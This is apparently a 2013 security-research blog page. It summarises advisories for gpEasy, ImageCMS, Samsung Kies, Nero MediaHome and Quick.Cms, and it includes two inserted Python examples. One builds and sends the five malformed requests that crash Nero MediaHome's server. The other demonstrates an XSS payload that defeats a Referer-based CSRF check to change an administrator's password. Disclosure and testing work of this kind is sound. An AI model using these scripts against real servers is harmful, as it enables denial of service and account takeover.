Wednesday, January 30, 2013

New members in High-Tech Bridge's Advisory Board

High-Tech Bridge

High-Tech Bridge announces new Advisory Board members:

  • Craig Spiezle
  • Anuj Singh
  • Jake Kouns
  • Brian Martin
  • Philippe Meyer

Their outstanding expertise and unique experience in information security and business development will bring an independent and unbiased assessment of High-Tech Bridge's development and tactics, to ensure the maximal level of the information security services offered by High-Tech Bridge.

Friday, January 25, 2013

HTB23137: gpEasy cross-site scripting (XSS) vulnerability

gpEasy CMS

gpEasy CMS version 3.5.2 is vulnerable to cross-site scripting (XSS) attacks against a logged-in administrator; details of the HTB23137 cross-site scripting vulnerability in gpEasy were disclosed this week. The vulnerability exists due to insufficient sanitisation of user-supplied data in the "section" HTTP GET parameter passed to the "index.php" script. The vulnerability is fixed: replace your "include/tool/editing_page.php" script with the latest version from GitHub. Full details are available on the researcher's page.

Thursday, January 24, 2013

HTB23132: ImageCMS SQL injection vulnerability

ImageCMS

ImageCMS version 4.0.0b is vulnerable to SQL injection attacks. The vulnerability exists due to insufficient filtration of the "q" HTTP GET parameter passed to the "/admin/admin_search/" URL. A remote authenticated administrator can execute arbitrary SQL commands in the application's database. Because the application has no protection against Cross-Site Request Forgery, a remote non-authenticated attacker can also exploit this vulnerability via a CSRF vector, by making a logged-in administrator's browser issue the crafted request.

To stay secure from this vulnerability, upgrade ImageCMS to version 4.2.

Source: High-Tech Bridge Advisory HTB23132 - SQL Injection Vulnerability in ImageCMS.

Wednesday, January 23, 2013

Story about OpenX

OpenX-Server

OpenX developers fixed cross-site scripting and SQL injection vulnerabilities in OpenX 2.8.10 (September 28, 2012). Four months later, on January 19, 2013, Golem.de published information about the further adventures of these vulnerabilities: "BSI warnt vor Werbebannern mit Javascript-Malware" (BSI warns of advertising banners carrying JavaScript malware).



Always stay secure.

The Ethical Hacker Network: Interview of Ilia Kolochenko

The Ethical Hacker Network (Donald C. Donzal, Editor-in-Chief) interviewed Ilia Kolochenko, CEO of High-Tech Bridge, about penetration testing, web application security, vulnerability research and more: Interview: Ilia Kolochenko, CEO of High-Tech Bridge.

Ilia Kolochenko at invest'11.

Friday, January 11, 2013

HTB23136: Samsung Kies remote buffer overflow vulnerability

Samsung Kies 2.5.0.12114_1 remote buffer overflow vulnerability

Samsung Kies 2.5.0.12114_1 is vulnerable to a remote buffer overflow. The vulnerability was discovered by High-Tech Bridge Security Research Lab and can be exploited to execute arbitrary code on a vulnerable system.

Description of buffer overflow in Samsung Kies:
The vulnerability exists due to insufficient sanitisation of input data in the PrepareSync() method within the ActiveX control SyncService.dll, GUID {EA8A3985-F9DF-4652-A255-E4E7772AFCA8}, located by default in "C:\Program Files\Samsung\Kies\External\DeviceModules\SyncService.dll". A remote attacker can pass an arbitrary value to the "password" argument of the PrepareSync() method and trigger an ACCESS_VIOLATION exception, which could be exploited to successfully overwrite the EIP register and the SEH structure.

Details of the Samsung Kies crash and proof-of-concept (PoC) code are available on the High-Tech Bridge website: Advisory HTB23136 - Remote Buffer Overflow Vulnerability in Samsung Kies.

Solution: Upgrade to Samsung Kies version 2.5.1.12123_2_7.

Previously, High-Tech Bridge Security Research Lab had already discovered multiple vulnerabilities in Samsung Kies 2.3.2.12054_20.

Thursday, January 10, 2013

HTB23130: Nero MediaHome multiple remote DoS vulnerabilities

Nero MediaHome
Nero MediaHome image from nero.com

Nero MediaHome version 4.5.8.0 is vulnerable to multiple remote denial-of-service (DoS) attacks, which an attacker can exploit to crash the server remotely.

All of the vulnerabilities are caused by improper handling of request lengths and headers within the "NMMediaServer.dll" dynamic-link library. A remote attacker can send specially crafted requests to port 54444/TCP (the Nero MediaHome server's default port):

  • an HTTP request of at least 500'000 characters causes a stack-based buffer overrun;
  • an HTTP HEAD request of at least 265'696 characters causes a heap-based buffer overrun;
  • a packet of at least 265'712 characters exploiting improper handling of the HTTP OPTIONS method length causes a heap-based buffer overrun;
  • a packet of at least 265'566 characters exploiting improper handling of the HTTP Referer header length causes a heap-based buffer overrun;
  • an HTTP request with a missing Host header crashes the server's HTTP parser.

Each of these crashes the Nero MediaHome server immediately after it receives the malformed request.

All details are available on High-Tech Bridge Advisory HTB23130 - Nero MediaHome Server Multiple Remote DoS vulnerabilities.
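The five trigger conditions above, as an added example that is not the advisory's PoC: builders that produce each malformed request at the stated minimum length, a front-end check that flags such requests before a fragile HTTP parser sees them, and a probe that reports whether a test instance still answers. The advisory gives only the total lengths and the default port; where the padding is placed inside each request, the placeholder Host value and the size limits used by the check are my assumptions.

```python
"""Added example: builders for the five malformed requests described in
HTB23130 and a front-end check that flags them before a fragile HTTP parser
sees them. Constructed for illustration; not the advisory's PoC. Where the
padding goes inside a request is my choice; the advisory gives only the
minimum total lengths and the default port."""
import socket
import sys

DEFAULT_PORT = 54444                 # Nero MediaHome server default port (advisory)
HOST_HDR = "Host: 127.0.0.1:54444"   # placeholder Host value (assumption)


def _request(method: str, uri: str, headers: list[str]) -> bytes:
    """Assemble a raw HTTP/1.1 request from its parts."""
    return "\r\n".join([f"{method} {uri} HTTP/1.1", *headers, "", ""]).encode("ascii")


def _padded(method: str, total_len: int, headers: list[str]) -> bytes:
    """Pad the request URI so the whole request is exactly total_len bytes."""
    pad = total_len - len(_request(method, "/", headers))
    return _request(method, "/" + "A" * pad, headers)


def oversized_request(total_len: int = 500_000) -> bytes:
    """Any request of >= 500'000 bytes: stack-based overrun per the advisory."""
    return _padded("GET", total_len, [HOST_HDR])


def oversized_head(total_len: int = 265_696) -> bytes:
    """HEAD request of >= 265'696 bytes: heap-based overrun."""
    return _padded("HEAD", total_len, [HOST_HDR])


def oversized_options(total_len: int = 265_712) -> bytes:
    """OPTIONS request of >= 265'712 bytes: heap-based overrun."""
    return _padded("OPTIONS", total_len, [HOST_HDR])


def oversized_referer(total_len: int = 265_566) -> bytes:
    """Referer header padded until the packet is >= 265'566 bytes: heap-based overrun."""
    prefix = "Referer: http://"
    pad = total_len - len(_request("GET", "/", [HOST_HDR, prefix]))
    return _request("GET", "/", [HOST_HDR, prefix + "A" * pad])


def missing_host() -> bytes:
    """Request without a Host header: crashes the server's HTTP parser."""
    return _request("GET", "/", ["User-Agent: probe"])


MAX_REQUEST = 65_536        # assumed sane limits for a media server's control channel
MAX_REQUEST_LINE = 8_192
MAX_HEADER_VALUE = 8_192


def inspect(request: bytes) -> set[str]:
    """Flag the conditions above; an empty set means the request looks ordinary."""
    flags = set()
    if len(request) > MAX_REQUEST:
        flags.add("request-too-large")
    head = request.split(b"\r\n\r\n", 1)[0]
    lines = head.split(b"\r\n")
    if len(lines[0]) > MAX_REQUEST_LINE:
        flags.add("request-line-too-long")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    if b"host" not in headers:
        flags.add("missing-host")
    if len(headers.get(b"referer", b"")) > MAX_HEADER_VALUE:
        flags.add("referer-too-long")
    return flags


def send_probe(host: str, payload: bytes, port: int = DEFAULT_PORT, timeout: float = 5.0) -> bool:
    """Send one payload to a test instance you own; True if the server answered,
    False if it dropped the connection or went silent (the DoS symptom)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(payload)
        try:
            return bool(s.recv(1))
        except (socket.timeout, ConnectionError):
            return False


if __name__ == "__main__":
    builders = [oversized_request, oversized_head, oversized_options, oversized_referer, missing_host]
    for build in builders:
        req = build()
        print(f"{build.__name__:18} {len(req):>7} bytes  flags={sorted(inspect(req))}")
        if len(sys.argv) > 1:          # only probe a host you are authorised to test
            print("  server answered:", send_probe(sys.argv[1], req))
```

Without an argument the script only builds and inspects the requests offline; with a host name it sends each one to port 54444/TCP and reports whether the server still answers, which is the check a practitioner runs against a patched instance.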

Wednesday, January 9, 2013

HTB23135: Quick.Cms and Quick.Cart cross-site scripting (XSS) vulnerability

Quick.Cart Quick.Cms

Cross-site scripting vulnerabilities in Quick.Cart 6.0 and Quick.Cms 5.0 were found and described in High-Tech Bridge Advisory HTB23135. Both products, developed by the OpenSolution team, suffer from these vulnerabilities.

The PoC exploitation examples use the JavaScript alert() function; nevertheless, a remote attacker can craft an exploit for this vulnerability that bypasses the application's CSRF protection mechanism, which is based on the HTTP Referer header, and changes the administrator's password. Additional details can be found on the researcher's page.

If you have Quick.Cms 5.0 or Quick.Cart 6.0 installed, make sure your copy was released after December 19, 2012, because the vendor fixed these two vulnerabilities without updating the changelog. Latest unaffected versions: Quick.Cms v5.0 (release date 2012.12.20) and Quick.Cart v6.0 (release date 2012.12.21).
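The two XSS entries on this page (HTB23137 in gpEasy and HTB23135 in Quick.Cms/Quick.Cart) share one mechanism, shown here as an added example that is neither project's code: a GET parameter reflected into an HTML attribute unescaped beside its escaped form, and a model of a Referer-based CSRF check that rejects a classic cross-site post but accepts the same post when it is issued by script the XSS injected into an administrator's page on the site's own origin. The origin, page names, cookie and form field are assumptions.

```python
"""Added example: a GET parameter reflected unescaped beside its escaped form,
and a model of a Referer-based CSRF check showing why script injected on the
same origin passes it. Constructed for illustration; the origin, page names and
form fields are assumptions, not gpEasy's or Quick.Cms's code."""
import html
from urllib.parse import urlsplit

SITE = "https://cms.example"        # hypothetical origin of the CMS


def render_vulnerable(section: str) -> str:
    """Echo the "section" GET parameter into an attribute unescaped (the bug class in HTB23137)."""
    return f'<input type="hidden" name="section" value="{section}">'


def render_fixed(section: str) -> str:
    """Escape for an HTML attribute context; quote=True also encodes the quote characters."""
    return f'<input type="hidden" name="section" value="{html.escape(section, quote=True)}">'


# Closes the attribute and the tag, then injects a script element.
XSS_PAYLOAD = '"><script>alert(1)</script>'


def referer_csrf_check(headers: dict) -> bool:
    """CSRF defence that only compares the Referer's host with the site's own."""
    ref = headers.get("Referer", "")
    return bool(ref) and urlsplit(ref).netloc == urlsplit(SITE).netloc


def change_password(headers: dict, form: dict) -> str:
    """Admin action guarded only by the Referer check (model of the protection HTB23135 bypasses)."""
    if not referer_csrf_check(headers):
        return "rejected"
    return f"password changed to {form['new_password']}"


def cross_site_request() -> tuple[dict, dict]:
    """Classic CSRF from an attacker's page: the browser sends the attacker's origin as Referer."""
    return ({"Referer": "https://evil.example/lure.html", "Cookie": "sid=admin-session"},
            {"new_password": "attacker-chosen"})


def request_from_injected_script() -> tuple[dict, dict]:
    """Same form post, but issued by script the XSS injected into an admin page on SITE:
    the Referer is now same-origin, so the check cannot tell it from a legitimate request."""
    return ({"Referer": SITE + "/index.php?section=news", "Cookie": "sid=admin-session"},
            {"new_password": "attacker-chosen"})


if __name__ == "__main__":
    print(render_vulnerable(XSS_PAYLOAD))
    print(render_fixed(XSS_PAYLOAD))
    print("cross-site:", change_password(*cross_site_request()))
    print("via XSS:   ", change_password(*request_from_injected_script()))
```

The check does its job against the cross-site post and is useless against the same-origin one, which is why the fix for both advisories is output encoding at the reflection point rather than a stronger CSRF check: script running on the origin can also read any anti-CSRF token the page carries.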